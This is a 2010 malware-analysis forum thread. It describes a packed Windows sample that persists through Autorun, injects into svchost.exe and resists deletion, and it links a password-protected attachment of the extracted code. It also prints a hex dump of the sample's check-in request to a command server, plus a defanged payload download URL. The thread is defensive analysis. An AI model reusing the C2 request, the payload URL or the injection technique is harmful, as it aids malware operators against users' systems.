A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #379  by EP_X0FF
 Mon Mar 22, 2010 4:11 am
Hi Ade,

Thank you for interesting sample.

Packed with UPX and custom malware packer/cryptor. Inside it contains several binded resources (window with button, version info block and encrypted data).
It sets itself to autostart with Windows through Autorun directory. After start this malware maps itself to svchost.exe memory and creates thread inside svchost.exe address space.
Thread set on wait with Sleep. Protects itself from deletion by keeping opened handle of executable from svchost.exe. Malware file (all files with equal name) inaccessible through Explorer.

In attach you will find extracted from svchost.exe malware code (import not restored).

Regards.
Attachments
pass: malware
(13.04 KiB) Downloaded 62 times
 #380  by kmd
 Mon Mar 22, 2010 6:01 am
performs network activity
4745 5420 2f6e 6577 2f63 6f6e 7472 6f6c GET /new/control
6c65 722e 7068 703f 6163 7469 6f6e 3d72 ler.php?action=r
6570 6f72 7426 7569 643d 3126 6775 6964 eport&uid=1&guid
3d34 3132 3832 3139 3737 3926 726e 643d =4128219779&rnd=
3132 3326 656e 7469 7479 3d31 3235 3933 123&entity=12593
3531 3439 303a 756e 6971 7565 5f73 7461 51490:unique_sta
7274 3b31 3236 3534 3634 3531 303a 756e rt;1265464510:un
6971 7565 5f73 7461 7274 2048 5454 502f ique_start HTTP/
312e 310d 0a48 6f73 743a 2063 6f6f 6c62 1.1..Host: coolb
6c65 6e64 6572 2e72 750d 0a0d 0a lender.ru....
Data received:

4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 0d0a .Server: nginx..
4461 7465 3a20 5375 6e2c 2032 3120 4d61 Date: Sun, 21 Ma
7220 3230 3130 2031 333a 3331 3a30 3020 r 2010 13:31:00
474d 540d 0a43 6f6e 7465 6e74 2d54 7970 GMT..Content-Typ
653a 2074 6578 742f 6874 6d6c 3b20 6368 e: text/html; ch
6172 7365 743d 7574 662d 380d 0a43 6f6e arset=utf-8..Con
6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection: close..
582d 506f 7765 7265 642d 4279 3a20 5048 X-Powered-By: PH
502f 352e 312e 360d 0a43 6f6e 7465 6e74 P/5.1.6..Content
2d4c 656e 6774 683a 2030 0d0a 0d0a -Length: 0....
http://anubis.iseclab.org/?action=resul ... format=txt

hxxp://173.208.143.194/app20.bin